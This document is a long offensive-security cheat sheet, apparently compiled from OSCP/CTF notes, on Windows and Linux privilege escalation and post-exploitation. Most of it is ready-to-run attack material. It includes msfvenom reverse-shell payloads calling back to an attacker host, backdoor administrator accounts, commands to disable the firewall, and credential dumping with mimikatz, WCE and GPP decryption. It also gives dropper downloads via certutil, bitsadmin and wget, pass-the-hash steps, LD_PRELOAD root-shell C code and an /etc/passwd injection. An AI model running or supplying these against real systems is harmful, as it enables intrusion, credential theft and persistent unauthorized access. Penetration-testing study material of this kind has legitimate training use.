|findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ # Using sc sc query sc qc service name # Look for Binary_path_name and see if it is unquoted.Exploit It If the path to the binary is: c:\Program Files\something\winamp.exe We can place a binary like this c:\program.exe When the program is restarted it will execute the binary program.exe, which we of course control. We can do this in any directory that has a space in its name. Not only program files. If the path contains a space and is not quoted, the service is vulnerable. This attack is explained here: http://toshellandback.com/2015/11/24/ms-priv-esc/ There is also a metasploit module for this is: exploit/windows/local/trusted_service_path Vulnerable Drivers Some driver might be vulnerable. I don't know how to check this in an efficient way. # List all drivers driverquery AlwaysInstallElevated: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated http://toshellandback.com/2015/11/24/ms-priv-esc/ Group Policy Preference: If the machine belongs to a domain and your user has access to System Volume Information there might be some sensitive files there. First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the environment-variables # Output environment-variables set # Look for the following: LOGONSERVER=\\NAMEOFSERVER USERDNSDOMAIN=WHATEVER.LOCAL # Look up ip-addres nslookup nameofserver.whatever.local # It will output something like this Address: 192.168.1.101 # Now we mount it net use z: \\192.168.1.101\SYSVOL # And enter it z: # Now we search for the groups.xml file dir Groups.xml /s If we find the file with a password in it, we can decrypt it like this in Kali gpp-decrypt encryptedpassword Services\Services.xml: Element-Specific Attributes ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element Printers\Printers.xml: SharedPrinter Element Drives\Drives.xml: Element-Specific Attributes DataSources\DataSources.xml: Element-Specific Attributes Escalate to SYSTEM from Administrator On Windows XP and Older: If you have a GUI with a user that is included in Administrators group you first need to open up cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do Run as Administrator you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe. This will give you a cmd with Administrators rights. From here we want to become SYSTEM user. To do this we run: First we check what time it is on the local machine: time # Now we set the time we want the system CMD to start. Probably one minuter after the time. at 01:23 /interactive cmd.exe And then the cmd with SYSTEM privs pops up. Vista and Newer You first need to upload PsExec.exe and then you run: psexec -i -s cmd.exe Kitrap On some machines the at 20:20 trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it only works with GUI. vdmallowed.exe vdmexploit.dll Using Metasploit So if you have a metasploit meterpreter session going you can run getsystem. Post modules Some interesting metasploit post-modules First you need to background the meterpreter shell and then you just run the post modules. use exploit/windows/local/service_permissions post/windows/gather/credentials/gpp run post/windows/gather/credential_collector run post/multi/recon/local_exploit_suggester run post/windows/gather/enum_shares run post/windows/gather/enum_snmp run post/windows/gather/enum_applications run post/windows/gather/enum_logged_on_users run post/windows/gather/checkvm Windows Privilege Escalation Methods Method #1: Metasploit getsystem (From local admin to SYSTEM) To escalate privileges from local administrator to SYSTEM user: meterpreter> use priv meterpreter> getsystem getsystem uses three methods to achieve that, the first two using named pipe impersonation and the third one, using token duplication. Method #2: Unquoted Service Paths It happens when when a developer fails to enclose the file path to a service with quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability. C:\Program Files\Some Folder\Config files\Service.exe Windows would try to execute: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Config.exe C:\Program Files\Some Folder\Config files\Service.exe So if we have write access on some target directory we can write a file on that directory: icacls "C:\Program Files\Some Folder" Search for: BUILTIN\Users: (OI) (CI) (M) (M) stands for Modify for (unprivileged) users For a full list of icacls output description: icacls preserves the canonical order of ACE entries as: Explicit denials Explicit grants Inherited denials Inherited grants Perm is a permission mask that can be specified in one of the following forms: A sequence of simple rights: F (full access) M (modify access) RX (read and execute access) R (read-only access) W (write-only access) A comma-separated list in parenthesis of specific rights: D (delete) RC (read control) WDAC (write DAC) WO (write owner) S (synchronize) AS (access system security) MA (maximum allowed) GR (generic read) GW (generic write) GE (generic execute) GA (generic all) RD (read data/list directory) WD (write data/add file) AD (append data/add subdirectory) REA (read extended attributes) WEA (write extended attributes) X (execute/traverse) DC (delete child) RA (read attributes) WA (write attributes) Inheritance rights may precede either Perm form, and they are applied only to directories: (OI): object inherit (CI): container inherit (IO): inherit only (NP): do not propagate inherit (I): permission inherited from parent container To know in which privileges is the service running (hopefully as SYSTEM): wmic service get name,startname Then we trojanize the service: msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=$IP LPORT=443 -f exe -o Config.exe And copy it to the folder we can write in: copy Config.exe C:\Program Files\Some Folder\ And sit and wait to the machine to be rebooted OR: shutdown /r /t 0 From metasploit: msf> use exploit/windows/local/trusted_service_path To exploit it manually: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ sc $SERVICENAME stop & sc $SERVICENAME start Method #3: Tokens Take advantage of: SeImpersonatePrivilege SeAssignPrimaryPrivilege Reference: https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/ Method #4: Hard coded credentials Commands: dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s Method #5: Sensitive files on Desktop, Documents (xls, txt, ) Take a look here as well Intro to Post Exploitation to find commands to search for sensitive files and information. Method #6: DLL injection / hijacking Trusted directories: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\KnownDLLs HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\SafeDllSearchMode HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\CWDIllegalInDllSearch Method #7: Unattended installation files (Unattend.xml) Unattended installs that were not cleaned properly can be abused. Mainly in those directories: dir C:\Windows\Panther\ dir C:\Windows\Panther\Unattend\ dir C:\Windows\System32\ dir C:\Windows\System32\sysprep\ In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf Using metasploit: msf> use post/windows/gather/enum_unattend Method #8: GPP cracking These Group policy configuration files that could contain passwords (Groups.xml) are “encrypted” using a known AES key. And found in a shared folder inside the domain controller with read access to all domain authenticated users. net use z: \\$IP\SYSVOL SYSVOL is simply a folder which resides on each and every domain controller within the domain. It contains the domains public files that need to be accessed by clients and kept synchronised between domain controllers. The default location for the SYSVOL is C:\Windows\SYSVOL although it can be moved to another location during the promotion of a domain controller. It’s possible but not recommended to relocate the SYSVOL after DC promotion as there is potential for error. The SYSVOL folder can be accessed through its share \\domainname.com\sysvol or the local share name on the server \\servername\sysvol. SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. By default there are two folders with a GUID name under ”C:\Windows\SYSVOL\domain\policies”, representing two group policies (GPO). In any new domain environment we always get two default GPO’s, Default Domain Policy and Domain Controllers Policy. To update your GPOs: gpupdate To look your current assigned GPOs: gpresult /R dir /s Groups.xml Other attack vector, more direct: findstr /S /I cpassword \\$FQDN\sysvol\$FQDN\policies\*.xml Once we get the hashed: In Linux: gpp-decrypt $AES_PASSWORD In Windows, use PowerSploit function Get-GPPPassword: Get-DecryptedCpassword $AES_PASSWORD https://social.technet.microsoft.com/wiki/contents/articles/24160.active-directory-back-to-basics-sysvol.aspx https://adsecurity.org/?p=2288 Method #9: Weak services and bad permissions Use AccessChk from sysinternals Which Services can be modified by any authenticated user (regardless of privilege level): accesschk.exe -uwcqv "Authenticated Users" * /accepteula List service parameters: accesschk.exe -ucqv $SERVICENAME Find all weak folder permissions per drive: accesschk.exe -uwdqs Users c:\ accesschk.exe -uwdqs "Authenticated Users" c:\ Find all weak file permissions per drive: accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.* Permissions on a specific folder: accesschk.exe Builtin\Users c:\inetpub Look at vulnerable service configuration parameters sc qc $SERVICE Locate interesting parameter, this is only an example sc config $SERVICE binpath="net user alien alien /add" sc stop $SERVICE sc start $SERVICE From metasploit (post module): msf> use exploit/windows/local/service_permissions Method #10: AlwaysInstallElevated ON Allows any MSI executable be run as SYSTEM. Manual method: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated Using Metasploit: msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi msiexec /quiet /qn /i C:\Users\$USER\Downloads\rotten.msi Another method with metasploit: If the machine has the AlwaysInstallElevated registry flag on, then just: msf> use exploit/windows/local/always_install_elevated Method #11: Abusing scheduled tasks schtasks /query /fo LIST /v tasklist /SVC Method #12: Local exploits msf> use exploit/windows/local/* Alternative methods of becoming SYSTEM https://blog.xpnsec.com/becoming-system/ Linux Privilege Escalation Methods Most common techniques for privilege escalation in Linux environments: Method #1: Find setuids Sometimes in CTFs there are trojans hidden in the system with the setuid set. Look for any of those using find command: find / -perm -4000 -ls 2> /dev/null Method #2: Find world writable directories find / -perm -777 -type d -ls 2> /dev/null Method #3: Find world readable logs or backups Many times Linux is very restrictive with the default permissions BUT sometimes sysadmins do not protect properly system backups, so you can easily extract sensitive system files such as /etc/passwd. Look for gz, tar o zip files is definitely worth it. find / -name "*.[gz,tar,zip]" 2> /dev/null Method #4: Check crontab tasks Added scheduled tasks may contain some misconfigurations like for example, one script is run by root and it is writable for everybody crontab -l ls -lR /etc/cron* Method #5: Local exploits for kernel or applications As part of your local enumeration information gathering, look for kernel versions, applications installed, daemons running in order to detect any old version with known exploits. Find setuid binaries: find / -perm -4000 -ls 2> /dev/null Find files world writable: find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null Find directories world writable: find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null Look for interesting files: find / -name "*.txt" -ls 2> /dev/null find / -name "*.log" -ls 2> /dev/null Check sudo: sudo su sudo -l Decrypt PKCS#12 objects: openssl pkcs12 -info -in $FILE Show certs in PKCS#7 file: openssl pkcs7 -print_certs -inform DER -in $FILE openssl smime -verify -in signed.p7 -inform pem openssl smime -verify -in signed.p7 -inform der Show keystore content: keytool -list -v -keystore keystore.jks Commands for information gathering: ps -ef mount /sbin/ifconfig -a route -n cat /etc/crontab ls -la /var/spool/cron*/ ls -la /etc/cron.d cat /etc/exports cat /etc/redhat* /etc/debian* /etc/*release netstat -tanu Find users with shell access: egrep -e '/bin/(ba)?sh' /etc/passwd Check bootup services: ls /etc/rc* SSH relationships and logins: cat ~/.ssh/* https://payatu.com/guide-linux-privilege-escalation/ Tools: http://pentestmonkey.net/tools/audit/unix-privesc-check https://github.com/sleventyeleven/Linuxprivchecker https://github.com/rebootuser/LinEnum Windows Post-exploitation Check filesystem: Like “ls -la” in Linux: dir /A:H dir /s /b C:\ | findstr /E ".txt" > txt.txt dir /s /b C:\ | findstr /E ".log" > log.txt dir /s /b C:\ | findstr /E ".doc" > doc.txt dir /s /b C:\ | findstr /E ".xls" > xls.txt dir /s /b C:\ | findstr /E ".xml" > xml.txt Compute MD5 hash: Get-FileHash -Algorithm MD5 -Path .\$FILE Check registry: reg query HKLM /f password /t REG_SZ /s > hklm_password.txt reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt Check scheduler: schtasks /query /fo LIST /v > schtasks.txt tasklist /SVC > tasklist.txt Other checks: DRIVERQUERY wmic os where Primary='TRUE' reboot List hotfixes: wmic qfe notepad myfile.txt:lion.txt eventvwr.exe quser > rdp.txt netstat -an > netstat.txt netsh firewall show config > firewall.txt icacls service.exe type C:\Windows\System32\drivers\etc\hosts Wmic commands: wmic service get name,displayname,pathname,startmode > wmic_service.txt wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect wmic /node:"" product get name,version,vendor wmic process get Caption,CommandLine wmic printer list status wmic cpu get List SIDs of the system (as admin): wmic useraccount get name,sid,fullname Net commands: net view net view \\host net share net use z: \\host\dir net users net user %username% net config rdr Backdoor account: net user hax0r hax0r /add net localgroup administrators hax0r /add net localgroup "Remote Desktop users" hax0r /add Check routing/network information: route print arp -A ipconfig /all getmac Show files attributes / permissions cacls cmd.exe attrib cmd.exe List services: sc queryex type=service state=all net start Other info: systeminfo whoami Idem for Win XP: echo %USERNAME% Firewall netsh firewall show stat netsh firewall show config netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000 netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080 netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079 Disable firewall: netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off RDP Show RDP sessions: quser qwinsta reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service type=remotedesktop mode=enable net start termservice net start "Terminal Services" svchost.exe -k termsvcs tasklist /svc /S servername/U username /P password Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet) msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1 Change RDP port: \HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389 Remote Execution commands: wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber tasklist.exe /S $IP /U domain\username tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running" taskkill.exe /S $IP /U domain\username /F /FI "norton" quser /SERVER:$IP From sysinternals psexec: psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1 Copy a file to the target host AND execute it: psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp Authenticated WMI Exec via Powershell msf > use exploit/windows/local/ps_wmi_exec msf exploit(windows/local/ps_wmi_exec) > show options Module options (exploit/windows/local/ps_wmi_exec): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN no Domain or machine name PASSWORD no Password to authenticate with RHOSTS no Target address range or CIDR identifier SESSION yes The session to run this module on. USERNAME no Username to authenticate as Exploit target: Id Name -- ---- 0 Universal msf exploit(windows/local/ps_wmi_exec) > In the same host but with other role: runas /user:administrator cmd runas /noprofile /user:DOMAIN\administrator cmd runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat" Windows exploit suggester (OBSOLETE) WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28) python windows-exploit-suggester.py --update python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt Tools for information gathering Manual method dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent dir %USERPROFILE%\Favorites type C:\Windows\System32\drivers\etc\hosts LaZagne Download LaZagne from https://github.com/AlessandroZ/LaZagne laZagne.exe all laZagne.exe browsers laZagne.exe browsers -firefox RATs (Remote Administration Tools) Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python Sniffers Sniffers for Windows Install Wireshark, also use in console dumpcap: dumpcap -D dumpcap -i $IFACE Keyloggers for Windows Windows keylogger (no admin rights): https://raw.githubusercontent.com/GiacomoLaw/Keylogger/master/windows/klog_main.cpp To cross-compile it for Windows: i686-w64-mingw32-g++ klog_main.cpp -o klog -static Network sniffers for Linux tcpdump -X -s 0 -i $INTERFACE Password dumping mimikatz mimikatz.exe mimikatz> privilege::debug mimikatz> sekurlsa::logonPasswords mimikatz> sekurlsa::msv Fgdump Dumps hashes (needs SYSTEM privileges) fgdump.exe WCE (Windows Credential Editor) Dumps clear passwords: wce -w Dumps hashes: wce Persistent, writes in credentials.txt: wce -r Change your credentials in memory: wce -s Droppers Droppers are programs that allows you to download tools, trojans, etc to the target machine to follow the compromise locally. Droppers using Linux wget http://$IP/file curl -k https://$IP/file > file nc -nvv $IP 8080 > file scp $FILE root@$IP:~ Droppers using Windows Powershell curl -Uri $URL See also Powercat in the Powershell frameworks section. ROBOCOPY NET USE \\$IP\IPC$ /USER:DOMAIN\USER ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z NET USE \\$IP\IPC$ /D BITSAdmin https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool Direct Transfer: bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE Using a download queue: bitsadmin /create myDownloadJob bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE Certutil certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe Notepad notepad.exe http://$IP/file.txt Living Off the Land (LOLbins) for Windows Links: https://github.com/LOLBAS-Project/LOLBAS https://lolbas-project.github.io/ https://gtfobins.github.io/ https://github.com/Arno0x/CSharpScripts https://gist.github.com/jstangroome/9adaa87a845e5be906c8 https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1 Examples: hh.exe C:\windows\system32\calc.exe C# compiler built-in command: csc.exe Droppers Using known protocols HTTP Python2 python -m SimpleHTTPServer python -m SimpleHTTPServer 80 Python3 python3 -m http.server 8080 Php php -S localhost:8000 Ruby ruby -run -e httpd . -p 8000 FTP pip install pyftpdlib python -m pyftpdlib SMB impacket-smbserver PAYLOADS /root/payload SharpUp.exe is part of the GhostPack suite of tools and is a C# port of PowerUp that will perform numerous privilege escalation checks. The following command will run all priv esc checks and store the output in a file. Command Reference: Output File: output.txt Command: Copy SharpUp.exe > output.txt https://github.com/GhostPack/SharpUp https://www.harmj0y.net/blog/redteaming/ghostpack/ winpeas.exe is a script that will search for all possible paths to escalate privileges on Windows hosts. The below command will run all priv esc checks and store the output in a file. Command Reference: Run all checks: cmd Output File: output.txt Command: Copy winpeas.exe cmd > output.txt Windows privesccheck winenum winpeas Enumerating all the access tokens on the victim system with PowerSploit: Invoke-TokenManipulation -ShowAll | ft -Wrap -Property domain,username,tokentype,logontype,processid Running the compiled code invokes a new process with the newly stolen token: One of the techniques of token manipulation is creating a new process with a token "stolen" from another process. This is when a token of an already existing access token present in one of the running processes on the victim host, is retrieved, duplicated and then used for creating a new process, making the new process assume the privileges of that stolen token. A high level process of the token stealing that will be carried out in this lab is as follows: Step Win32 API Open a process with access token you want to steal OpenProcess Get a handle to the access token of that process OpenProcesToken Make a duplicate of the access token present in that process DuplicateTokenEx Create a new process with the newly aquired access token CreateProcessWithTokenW DLL Hijacking DLL Search Order Hijacking for privilege escalation, code execution, etc. Generating a DLL that will be loaded and executed by a vulnerable program which connect back to the attacking system with a meterpreter shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter64.dll Pass The Hash: Privilege Escalation with Invoke-WMIExec If you have an NTLMv2 hash of a local administrator on a box ws01, it's possible to pass that hash and execute code with privileges of that local administrator account: Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username administrator -command hostname If the target system you are passing the hash to, has the following registry key/value/data set to 0x1, pass the hash will work even for accounts that are not RID 500: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username spotless -command hostname #enumerate the users #rid brute forcing cme smb $ip -u "" -p "" --rid-brute #active sessions cme smb $ip -u '' -p '' --loggedon-users #users in general cme smb $ip -u '' -p '' --users ​ #enumerate the groups #local groups cme smb $ip -u '' -p '' --local-groups #domain groups cme smb $ip -u '' -p '' --groups #smbclient smbclient -L $ip smbclient //$ip/tmp smbclient \\\\192.168.1.105\\ipc$ -U john smbclient //$ip/ipc$ -U john ​ #mounting the share mkdir /mnt/targetshare mount -t cifs \\172.16.20.88\ipc$ -o username=[username] /mnt/targetshare nmap nmap -sU -p 69 --script tftp-enum.nse $ip Interact with TFTP protocol: #setup the connection tftp 172.16.200.100 #get a file tftp> get /etc/passwd #upload reverse shell tftp> put shell.php enumerate information with known community string # enumerate windows users snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerates running processes snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1. Linux Privilege Escalation OS & User Enumeration : ############################### User Enumeration ########################## whoami id sudo -l cat /etc/passwd ls -la /etc/shadow ################################# OS Enumeration ########################## cat /etc/issue cat /etc/*-release cat /proc/version uname -a arch ldd --version ################################# Installed tools ######################### which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp ############################ File owners and permissions ################## ls -la find . -ls history cat ~/.bash_history find / -type f -user -readable 2> /dev/null # Readable files for find / -writable -type d 2>/dev/null # Writable files by the user find /usr/local/ -type d -writable ################################## File mount ############################# /mnt /media -> usb devices and other mounted disks mount -> show all the mounted drives df -h -> list all partitions cat /etc/fstab # list all drives mounted at boot time /bin/lsblk #################################### Applications ######################### dpkg -l # for Debian based systems ##################################### Cron tabs ########################### ls -lah /etc/cron* cat /etc/crontab ls -la /var/log/cron* # Locating cron logs find / -name cronlog 2>/dev/null grep "CRON" /var/log/cron.log # for locating running jobs from logs grep CRON /var/log/syslog # grepping cron from syslog #################################### Internal Ports ####################### Netstat -alnp | grep LIST | grep port_num Netstat -antp netstat -tulnp curl the listening ports ################################### Interesting DIRS ###################### /dev/scripts /opt /mnt /var/www/html /var /etc /media /backup ################################### SUID Binaries ######################### (https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binar find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/ find / -perm -u=s -type f 2>/dev/null find / -perm -4000 -user root 2>/dev/null ldd /usr/bin/binary-name strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file ################################# Firewall Enumeration #################### grep -Hs iptables /etc/* ############################### Kernal Modules ############################ lsmod /sbin/modinfo PrivEsc Checklist : sudo rights (https://medium.com/schkn/linux-privilege-escalation-using-text-editors- and-files-part-1-a8373396708d) sensitive files & permission misconfiguration (SSH keys, shadow files) SUID Binaries Internal Ports Processes running with root privilege Cron tabs Hidden cron process with pspy Mounted filesystems TMUX session hijacking Path Hijacking Process Injection (https://github.com/nongiach/sudo_inject) Docker PS Interesting groups (https://book.hacktricks.xyz/linux-unix/privilege- escalation/interesting-groups-linux-pe) Wheel Shadow Disk Video Root Docker lxd - (https://www.hackingarticles.in/lxd-privilege-escalation/) Environment variables bash version < 4.2-048 | 4.4 (https://tryhackme.com/room/linuxprivesc Task 14, 15) NFS Misconfiguration linpeas.sh -a //all checks SUID Shared Object Injection : Find a SUID binary that looks fishy strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file" Match the shared object that sits in a path where you have write access create a shared object in the missing SO file name run the SUID binary NFS Misconfiguration : https://tryhackme.com/room/linuxprivesc (Task 19) cat /etc/exports On Kali mkdir /tmp/nfs mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf chmod +xs /tmp/nfs/shell.elf On Target /tmp/shell.elf Kernel Exploits cat /proc/version uname -r uname -mrs cat /etc/lsb-release cat /etc/os-release gcc exploit.c -o exp Compile exploit in local machine and upload to remote machine gcc -m32 -Wl,--hash-style=both 9542.c -o 9542 apt-get install gcc-multilib Recover Deleted Files : extundelete (HTB mirai - https://tiagotavares.io/2017/11/mirai-hack-the-box-retired/) strings C Program to SetUID /bin/bash : gcc -Wall suid.c -o exploit sudo chown root exploit sudo chmod u+s exploit $ ls -l exploit -rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit #include int main() { setuid(0); execl("/bin/bash", "bash", (char *)NULL); return 0; } ./exploit # whoami root Tools : Linux Exploit Suggester (HTB Nibbles) (https://github.com/mzet-/linux-exploit- suggester) SUIDENUM (https://github.com/Anon-Exploiter/SUID3NUM) LinEnum.sh (https://github.com/rebootuser/LinEnum) linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts- suite/tree/master/linPEAS) Linprivchecker (https://github.com/sleventyeleven/linuxprivchecker) pspy (https://github.com/DominicBreuker/pspy) (crontabs) Resources : https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html https://github.com/Ignitetechnologies/Privilege-Escalation https://gtfobins.github.io/ https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Mysql MYSQL UDF Exploit: https://www.exploit-db.com/exploits/1518 gcc -g -c raptor_udf2.c -fPIC 1 gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o - mysql -u root 45 use mysql; create table foo(line blob); insert into foo values(load_file('/home/raptor_udf2.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; create function do_system returns integer soname 'raptor_udf2.so'; select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash'); exit user@target$ /tmp/rootbash -p MYSQL running as root : mysql -u root select sys_exec('whoami'); select sys_eval('whoami'); /* If function doesnt exist, create the function */ CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'; if NULL returns, try redirecting the errors 9 select sys_eval('ls /root 2>&1'); Sudo Abuse $ sudo -l [sudo] password for appadmin: User appadmin may run the following commands on this host: (root) /opt/Support/start.sh Checklist: Write permission to start.sh write permission to the /opt/support Create start.sh if doesn't exist Environment Variables (https://tryhackme.com/room/linuxprivesc) Check which environment variables are inherited (look for the env_keep options): sudo -l LD_PRELOAD LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library. /* Preload.c */ #include #include #include void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); } gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object: sudo LD_PRELOAD=/tmp/preload.so program-name-here LD_LIBRARY_PATH LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first. Run ldd against the any program that you can execute as sudo (sudo -l) to see which shared libraries are used by the program: ldd /usr/sbin/apache2 Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c: /* Library_path.c */ #include #include static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); 10 system("/bin/bash -p"); } gcc -o /tmp/libcrypt.so.1 -shared -fPIC library_path.c Run program using sudo, while settings the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object): sudo LD_LIBRARY_PATH=/tmp program-name-here Escalation Methods echo root:gl0b0 | /usr/sbin/chpasswd // exploit : exploit (pwd) echo "exploit:YZE7YPhZJyUks:0:0:root:/root:/bin/bash" >> /etc/passwd | su - nano /etc/passwd -> change GID to root nano /etc/sudoers -> user ALL=(ALL) NOPASSWD:ALL cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash; /tmp/rootbash -p Windows Privilege Escalation Enumeration OS Info Enumeration systeminfo hostname echo %username% wmic qfe -> check patches wmic logicaldisk -> get other disk information User Enumeration whoami whoami /priv -> check user privilleges whoami /groups -> check user groups net user -> list all users net user -> check groups associated with a user net localgroup -> Check all the local groups available net localgroup -> List the members of the given localgroup Task | Service | Process Enumeration sc queryex type= service (Lists all the service) tasklist /SVC tasklist net start DRIVERQUERY wmic product get name, version, vendor Permission Enumeration C:\Program Files : icacls program_name icacls root.txt /grant :F (to grant permission to access file) Check the PowerShell history file type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadlin e\ConsoleHost_history.txt Check stored usernames and passwords cmdkey /list Network based ipconfig ipconfig /all arp -a router print netstat -ano Password Hunting findstr /si password *.txt *.ini *.config (try searching in differe dir /s *pass* == *cred* == *vnc* == *.config* dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* where /R C:\ user.txt where /R C:\ *.ini Swisskyrepo for manual pwd enumeration AV / Firewall check / Service Enumeration sc query windefend 1 netsh advfirewall firewall dump netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all 4 netsh firewall show state (show firewall running or stopped) netsh firewall show config (show firewall configuration) netsh firewall set opmode disable # Disable firewall Scheduled Tasks schtasks /query /fo LIST /v Mount Information mountvol Escalation Techniques: Service Account Priv Esc (Token Impersonation) whoami /priv Run As : Use the cmdkey to list the stored credentials on the machine. cmdkey /list Currently stored credentials: Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator Using runas with a provided set of credential. runas /savecred /user:admin C:\PrivEsc\reverse.exe C:\Windows\System32\runas.exe /env /noprofile /user: "c Access check : accesschk.exe -ucqv [service_name] /accepteula accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8) Find all weak folder permissions per drive. accesschk.exe /accepteula -uwdqs 